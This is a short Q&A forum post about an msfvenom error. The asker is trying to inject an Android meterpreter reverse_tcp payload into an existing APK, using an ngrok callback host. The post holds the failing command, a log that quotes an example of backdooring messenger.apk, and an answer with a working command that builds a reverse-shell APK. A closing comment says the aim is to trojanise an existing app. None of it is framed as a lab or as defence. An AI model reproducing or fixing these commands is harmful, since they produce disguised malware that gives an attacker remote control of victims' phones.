# How to solve this error while executing msfvenom?

Tags: apk, ngrok, metasploit

Command

```
msfvenom -x xxxxxx.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16222 -o /home/snow/Desktop/xxxxxx.apk
```

Log and error definition after running the above command:

```
Using APK template: xxxxxx.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /opt/metasploit-framework/bin/../embedded/framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: xxxxxx.apk
```

Answer (score 0):

Try `msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16222 -R > /home/snow/Desktop/xxxxxx.apk` instead

Comment: it works and forms a specific apk ,what i want to do is to reverse a existing apk